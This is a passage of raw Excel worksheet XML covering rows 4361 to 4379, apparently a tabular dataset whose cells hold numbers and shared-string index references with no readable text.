        <v>11536</v>
      </c>
      <c r="M4361" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4361" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4361" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4361" s="12">
        <v>3.1</v>
      </c>
      <c r="Q4361" s="12">
        <v>3.1</v>
      </c>
      <c r="R4361" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4361" s="12" t="s">
        <v>28041</v>
      </c>
      <c r="T4361" s="12" t="s">
        <v>28042</v>
      </c>
      <c r="U4361" s="12" t="s">
        <v>28043</v>
      </c>
      <c r="V4361" s="12" t="s">
        <v>27020</v>
      </c>
      <c r="W4361" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4361" s="12">
        <v>11</v>
      </c>
      <c r="Y4361" s="12" t="s">
        <v>28044</v>
      </c>
    </row>
    <row r="4362" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4362" s="12">
        <v>120231</v>
      </c>
      <c r="B4362" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4362" s="12" t="s">
        <v>31441</v>
      </c>
      <c r="F4362" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4362" s="12" t="s">
        <v>28045</v>
      </c>
      <c r="H4362" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4362" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4362" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K4362" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4362" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4362" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4362" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4362" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4362" s="12" t="s">
        <v>28035</v>
      </c>
      <c r="Q4362" s="12">
        <v>4.7</v>
      </c>
      <c r="R4362" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4362" s="12" t="s">
        <v>28046</v>
      </c>
      <c r="T4362" s="12" t="s">
        <v>14269</v>
      </c>
      <c r="U4362" s="12" t="s">
        <v>28047</v>
      </c>
      <c r="V4362" s="12" t="s">
        <v>22018</v>
      </c>
      <c r="W4362" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4362" s="12">
        <v>5</v>
      </c>
      <c r="Y4362" s="12" t="s">
        <v>28048</v>
      </c>
    </row>
    <row r="4363" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4363" s="12">
        <v>120591</v>
      </c>
      <c r="B4363" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4363" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="E4363" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4363" s="12" t="s">
        <v>31153</v>
      </c>
      <c r="G4363" s="12" t="s">
        <v>28049</v>
      </c>
      <c r="H4363" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4363" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4363" s="12" t="s">
        <v>1656</v>
      </c>
      <c r="K4363" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4363" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4363" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4363" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4363" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4363" s="12" t="s">
        <v>28050</v>
      </c>
      <c r="Q4363" s="12">
        <v>4.7</v>
      </c>
      <c r="R4363" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4363" s="12" t="s">
        <v>28051</v>
      </c>
      <c r="T4363" s="12" t="s">
        <v>28039</v>
      </c>
      <c r="U4363" s="12" t="s">
        <v>28052</v>
      </c>
      <c r="V4363" s="12" t="s">
        <v>3602</v>
      </c>
      <c r="W4363" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4363" s="12">
        <v>8</v>
      </c>
      <c r="Y4363" s="12" t="s">
        <v>28053</v>
      </c>
    </row>
    <row r="4364" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4364" s="12">
        <v>120631</v>
      </c>
      <c r="B4364" s="12" t="s">
        <v>30769</v>
      </c>
      <c r="D4364" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4364" s="12" t="s">
        <v>30773</v>
      </c>
      <c r="G4364" s="12" t="s">
        <v>28054</v>
      </c>
      <c r="H4364" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4364" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4364" s="12" t="s">
        <v>181</v>
      </c>
      <c r="K4364" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4364" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4364" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4364" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4364" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4364" s="12" t="s">
        <v>28055</v>
      </c>
      <c r="Q4364" s="12">
        <v>4.0999999999999996</v>
      </c>
      <c r="R4364" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4364" s="12" t="s">
        <v>28056</v>
      </c>
      <c r="T4364" s="12" t="s">
        <v>28057</v>
      </c>
      <c r="U4364" s="12" t="s">
        <v>28058</v>
      </c>
      <c r="V4364" s="12" t="s">
        <v>6839</v>
      </c>
      <c r="W4364" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4364" s="12">
        <v>13</v>
      </c>
      <c r="Y4364" s="12" t="s">
        <v>28059</v>
      </c>
    </row>
    <row r="4365" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4365" s="12">
        <v>121161</v>
      </c>
      <c r="B4365" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4365" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4365" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F4365" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4365" s="12" t="s">
        <v>28060</v>
      </c>
      <c r="H4365" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4365" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4365" s="12" t="s">
        <v>28061</v>
      </c>
      <c r="K4365" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4365" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4365" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4365" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4365" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4365" s="12" t="s">
        <v>28062</v>
      </c>
      <c r="Q4365" s="12">
        <v>4.7</v>
      </c>
      <c r="R4365" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4365" s="12" t="s">
        <v>28063</v>
      </c>
      <c r="T4365" s="12" t="s">
        <v>28064</v>
      </c>
      <c r="U4365" s="12" t="s">
        <v>28065</v>
      </c>
      <c r="V4365" s="12" t="s">
        <v>28066</v>
      </c>
      <c r="W4365" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4365" s="12">
        <v>2</v>
      </c>
      <c r="Y4365" s="12" t="s">
        <v>28067</v>
      </c>
    </row>
    <row r="4366" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4366" s="12">
        <v>121701</v>
      </c>
      <c r="B4366" s="12" t="s">
        <v>30515</v>
      </c>
      <c r="C4366" s="12" t="s">
        <v>30561</v>
      </c>
      <c r="D4366" s="12" t="s">
        <v>30562</v>
      </c>
      <c r="E4366" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4366" s="12" t="s">
        <v>30562</v>
      </c>
      <c r="G4366" s="12" t="s">
        <v>28068</v>
      </c>
      <c r="H4366" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4366" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4366" s="12" t="s">
        <v>744</v>
      </c>
      <c r="K4366" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4366" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4366" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4366" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4366" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4366" s="12" t="s">
        <v>28069</v>
      </c>
      <c r="Q4366" s="12">
        <v>4.7</v>
      </c>
      <c r="R4366" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4366" s="12" t="s">
        <v>28070</v>
      </c>
      <c r="T4366" s="12" t="s">
        <v>27939</v>
      </c>
      <c r="U4366" s="12" t="s">
        <v>28071</v>
      </c>
      <c r="V4366" s="12" t="s">
        <v>25878</v>
      </c>
      <c r="W4366" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4366" s="12">
        <v>40</v>
      </c>
      <c r="Y4366" s="12" t="s">
        <v>28072</v>
      </c>
    </row>
    <row r="4367" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4367" s="12">
        <v>135691</v>
      </c>
      <c r="B4367" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4367" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4367" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4367" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4367" s="12" t="s">
        <v>28073</v>
      </c>
      <c r="H4367" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4367" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4367" s="12" t="s">
        <v>9219</v>
      </c>
      <c r="K4367" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4367" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4367" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4367" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4367" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4367" s="12" t="s">
        <v>28074</v>
      </c>
      <c r="Q4367" s="12">
        <v>4.3</v>
      </c>
      <c r="R4367" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4367" s="12" t="s">
        <v>28075</v>
      </c>
      <c r="T4367" s="12" t="s">
        <v>25878</v>
      </c>
      <c r="U4367" s="12" t="s">
        <v>28076</v>
      </c>
      <c r="V4367" s="12" t="s">
        <v>25878</v>
      </c>
      <c r="W4367" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4367" s="12">
        <v>21</v>
      </c>
      <c r="Y4367" s="12" t="s">
        <v>28077</v>
      </c>
    </row>
    <row r="4368" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4368" s="12">
        <v>150571</v>
      </c>
      <c r="B4368" s="12" t="s">
        <v>30537</v>
      </c>
      <c r="D4368" s="12" t="s">
        <v>30562</v>
      </c>
      <c r="E4368" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4368" s="12" t="s">
        <v>30562</v>
      </c>
      <c r="G4368" s="12" t="s">
        <v>28090</v>
      </c>
      <c r="H4368" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4368" s="12" t="s">
        <v>152</v>
      </c>
      <c r="J4368" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K4368" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4368" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4368" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4368" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4368" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4368" s="12" t="s">
        <v>28091</v>
      </c>
      <c r="Q4368" s="12">
        <v>4.8</v>
      </c>
      <c r="R4368" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4368" s="12" t="s">
        <v>28092</v>
      </c>
      <c r="T4368" s="12" t="s">
        <v>28093</v>
      </c>
      <c r="U4368" s="12" t="s">
        <v>28094</v>
      </c>
      <c r="V4368" s="12" t="s">
        <v>299</v>
      </c>
      <c r="W4368" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4368" s="12">
        <v>9</v>
      </c>
      <c r="Y4368" s="12" t="s">
        <v>28095</v>
      </c>
    </row>
    <row r="4369" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4369" s="12">
        <v>150841</v>
      </c>
      <c r="B4369" s="12" t="s">
        <v>30187</v>
      </c>
      <c r="D4369" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E4369" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4369" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4369" s="12" t="s">
        <v>28096</v>
      </c>
      <c r="H4369" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4369" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4369" s="12" t="s">
        <v>744</v>
      </c>
      <c r="K4369" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4369" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4369" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4369" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4369" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4369" s="12" t="s">
        <v>28097</v>
      </c>
      <c r="Q4369" s="16">
        <v>3.1</v>
      </c>
      <c r="R4369" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4369" s="12" t="s">
        <v>28098</v>
      </c>
      <c r="T4369" s="12" t="s">
        <v>25878</v>
      </c>
      <c r="U4369" s="12" t="s">
        <v>28099</v>
      </c>
      <c r="V4369" s="12" t="s">
        <v>25878</v>
      </c>
      <c r="W4369" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4369" s="12">
        <v>14</v>
      </c>
      <c r="Y4369" s="12" t="s">
        <v>28100</v>
      </c>
    </row>
    <row r="4370" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4370" s="12">
        <v>151501</v>
      </c>
      <c r="B4370" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4370" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4370" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4370" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4370" s="12" t="s">
        <v>28101</v>
      </c>
      <c r="H4370" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4370" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4370" s="12" t="s">
        <v>744</v>
      </c>
      <c r="K4370" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4370" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4370" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4370" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4370" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4370" s="12">
        <v>4.7</v>
      </c>
      <c r="Q4370" s="12">
        <v>4.7</v>
      </c>
      <c r="R4370" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4370" s="12" t="s">
        <v>28102</v>
      </c>
      <c r="T4370" s="12" t="s">
        <v>25878</v>
      </c>
      <c r="U4370" s="12" t="s">
        <v>28103</v>
      </c>
      <c r="V4370" s="12" t="s">
        <v>25878</v>
      </c>
      <c r="W4370" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4370" s="12">
        <v>22</v>
      </c>
      <c r="Y4370" s="12" t="s">
        <v>28104</v>
      </c>
    </row>
    <row r="4371" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4371" s="12">
        <v>151701</v>
      </c>
      <c r="B4371" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C4371" s="12" t="s">
        <v>28357</v>
      </c>
      <c r="D4371" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F4371" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="G4371" s="12" t="s">
        <v>28105</v>
      </c>
      <c r="H4371" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4371" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4371" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4371" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4371" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4371" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4371" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4371" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4371" s="12" t="s">
        <v>28106</v>
      </c>
      <c r="Q4371" s="12">
        <v>4.5999999999999996</v>
      </c>
      <c r="R4371" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4371" s="12" t="s">
        <v>28107</v>
      </c>
      <c r="T4371" s="12" t="s">
        <v>27534</v>
      </c>
      <c r="U4371" s="12" t="s">
        <v>28108</v>
      </c>
      <c r="V4371" s="12" t="s">
        <v>27646</v>
      </c>
      <c r="W4371" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4371" s="12">
        <v>10</v>
      </c>
      <c r="Y4371" s="12" t="s">
        <v>28109</v>
      </c>
    </row>
    <row r="4372" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4372" s="12">
        <v>153961</v>
      </c>
      <c r="B4372" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4372" s="12" t="s">
        <v>30392</v>
      </c>
      <c r="F4372" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4372" s="12" t="s">
        <v>28115</v>
      </c>
      <c r="H4372" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4372" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4372" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4372" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4372" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4372" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4372" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4372" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4372" s="12" t="s">
        <v>28106</v>
      </c>
      <c r="Q4372" s="12">
        <v>4.5999999999999996</v>
      </c>
      <c r="R4372" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4372" s="12" t="s">
        <v>28116</v>
      </c>
      <c r="T4372" s="12" t="s">
        <v>28117</v>
      </c>
      <c r="U4372" s="12" t="s">
        <v>28118</v>
      </c>
      <c r="V4372" s="12" t="s">
        <v>9838</v>
      </c>
      <c r="W4372" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4372" s="12">
        <v>1</v>
      </c>
      <c r="Y4372" s="12" t="s">
        <v>28119</v>
      </c>
    </row>
    <row r="4373" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4373" s="12">
        <v>172401</v>
      </c>
      <c r="B4373" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4373" s="12" t="s">
        <v>30906</v>
      </c>
      <c r="E4373" s="12" t="s">
        <v>31432</v>
      </c>
      <c r="F4373" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4373" s="12" t="s">
        <v>28120</v>
      </c>
      <c r="H4373" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4373" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J4373" s="12" t="s">
        <v>23</v>
      </c>
      <c r="K4373" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L4373" s="12" t="s">
        <v>4026</v>
      </c>
      <c r="M4373" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N4373" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O4373" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4373" s="12" t="s">
        <v>28121</v>
      </c>
      <c r="Q4373" s="12">
        <v>3.18</v>
      </c>
      <c r="R4373" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4373" s="12" t="s">
        <v>28122</v>
      </c>
      <c r="T4373" s="12" t="s">
        <v>10134</v>
      </c>
      <c r="U4373" s="12" t="s">
        <v>28123</v>
      </c>
      <c r="V4373" s="12" t="s">
        <v>3738</v>
      </c>
      <c r="W4373" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4373" s="12">
        <v>13</v>
      </c>
      <c r="Y4373" s="12" t="s">
        <v>28124</v>
      </c>
    </row>
    <row r="4374" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4374" s="12">
        <v>177171</v>
      </c>
      <c r="B4374" s="12" t="s">
        <v>31396</v>
      </c>
      <c r="D4374" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4374" s="12" t="s">
        <v>31548</v>
      </c>
      <c r="F4374" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G4374" s="12" t="s">
        <v>28125</v>
      </c>
      <c r="H4374" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4374" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4374" s="12" t="s">
        <v>3174</v>
      </c>
      <c r="K4374" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4374" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4374" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4374" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4374" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4374" s="12">
        <v>4.8</v>
      </c>
      <c r="Q4374" s="12">
        <v>4.8</v>
      </c>
      <c r="R4374" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4374" s="12" t="s">
        <v>28126</v>
      </c>
      <c r="T4374" s="12" t="s">
        <v>28127</v>
      </c>
      <c r="U4374" s="12" t="s">
        <v>28128</v>
      </c>
      <c r="V4374" s="12" t="s">
        <v>28129</v>
      </c>
      <c r="W4374" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4374" s="12">
        <v>10</v>
      </c>
      <c r="Y4374" s="12" t="s">
        <v>28130</v>
      </c>
    </row>
    <row r="4375" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4375" s="12">
        <v>178591</v>
      </c>
      <c r="B4375" s="12" t="s">
        <v>31137</v>
      </c>
      <c r="D4375" s="12" t="s">
        <v>31186</v>
      </c>
      <c r="F4375" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4375" s="12" t="s">
        <v>28131</v>
      </c>
      <c r="H4375" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4375" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4375" s="12" t="s">
        <v>2586</v>
      </c>
      <c r="K4375" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4375" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4375" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4375" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4375" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4375" s="12" t="s">
        <v>28132</v>
      </c>
      <c r="Q4375" s="12">
        <v>4.9000000000000004</v>
      </c>
      <c r="R4375" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4375" s="12" t="s">
        <v>28133</v>
      </c>
      <c r="T4375" s="12" t="s">
        <v>28134</v>
      </c>
      <c r="U4375" s="12" t="s">
        <v>28135</v>
      </c>
      <c r="V4375" s="12" t="s">
        <v>4461</v>
      </c>
      <c r="W4375" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4375" s="12">
        <v>3</v>
      </c>
      <c r="Y4375" s="12" t="s">
        <v>28136</v>
      </c>
    </row>
    <row r="4376" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4376" s="12">
        <v>180111</v>
      </c>
      <c r="B4376" s="12" t="s">
        <v>30911</v>
      </c>
      <c r="C4376" s="12" t="s">
        <v>30912</v>
      </c>
      <c r="D4376" s="12" t="s">
        <v>30906</v>
      </c>
      <c r="E4376" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4376" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4376" s="12" t="s">
        <v>28137</v>
      </c>
      <c r="H4376" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4376" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4376" s="12" t="s">
        <v>744</v>
      </c>
      <c r="K4376" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4376" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4376" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4376" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4376" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4376" s="12" t="s">
        <v>28138</v>
      </c>
      <c r="Q4376" s="12">
        <v>4.9000000000000004</v>
      </c>
      <c r="R4376" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4376" s="12" t="s">
        <v>28139</v>
      </c>
      <c r="T4376" s="12" t="s">
        <v>25878</v>
      </c>
      <c r="U4376" s="12" t="s">
        <v>28140</v>
      </c>
      <c r="V4376" s="12" t="s">
        <v>25878</v>
      </c>
      <c r="W4376" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4376" s="12">
        <v>11</v>
      </c>
      <c r="Y4376" s="12" t="s">
        <v>28141</v>
      </c>
    </row>
    <row r="4377" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4377" s="12">
        <v>181381</v>
      </c>
      <c r="B4377" s="12" t="s">
        <v>30452</v>
      </c>
      <c r="D4377" s="12" t="s">
        <v>30499</v>
      </c>
      <c r="E4377" s="12" t="s">
        <v>31548</v>
      </c>
      <c r="F4377" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4377" s="12" t="s">
        <v>28142</v>
      </c>
      <c r="H4377" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4377" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4377" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K4377" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4377" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4377" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4377" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4377" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4377" s="12" t="s">
        <v>28143</v>
      </c>
      <c r="Q4377" s="12">
        <v>4.9000000000000004</v>
      </c>
      <c r="R4377" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4377" s="12" t="s">
        <v>28144</v>
      </c>
      <c r="T4377" s="12" t="s">
        <v>9452</v>
      </c>
      <c r="U4377" s="12" t="s">
        <v>28145</v>
      </c>
      <c r="V4377" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="W4377" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4377" s="12">
        <v>9</v>
      </c>
      <c r="Y4377" s="12" t="s">
        <v>28146</v>
      </c>
    </row>
    <row r="4378" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4378" s="12">
        <v>187061</v>
      </c>
      <c r="B4378" s="12" t="s">
        <v>30134</v>
      </c>
      <c r="C4378" s="12" t="s">
        <v>30135</v>
      </c>
      <c r="D4378" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E4378" s="18" t="s">
        <v>31426</v>
      </c>
      <c r="F4378" s="12" t="s">
        <v>30136</v>
      </c>
      <c r="G4378" s="12" t="s">
        <v>28147</v>
      </c>
      <c r="H4378" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4378" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4378" s="12" t="s">
        <v>347</v>
      </c>
      <c r="K4378" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4378" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4378" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4378" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4378" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4378" s="12" t="s">
        <v>28148</v>
      </c>
      <c r="Q4378" s="12">
        <v>4.9000000000000004</v>
      </c>
      <c r="R4378" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4378" s="12" t="s">
        <v>28149</v>
      </c>
      <c r="T4378" s="12" t="s">
        <v>28150</v>
      </c>
      <c r="U4378" s="12" t="s">
        <v>28151</v>
      </c>
      <c r="V4378" s="12" t="s">
        <v>28152</v>
      </c>
      <c r="W4378" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4378" s="12">
        <v>20</v>
      </c>
      <c r="Y4378" s="12" t="s">
        <v>28153</v>
      </c>
    </row>
    <row r="4379" spans="1:25" ht="16" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4379" s="12">
        <v>187311</v>
      </c>
      <c r="B4379" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4379" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="E4379" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4379" s="12" t="s">
        <v>31187</v>
      </c>
      <c r="G4379" s="12" t="s">
        <v>28160</v>
      </c>
      <c r="H4379" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4379" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4379" s="12" t="s">
        <v>744</v>
      </c>
      <c r="K4379" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4379" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4379" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4379" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4379" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4379" s="12" t="s">
        <v>28161</v>
      </c>
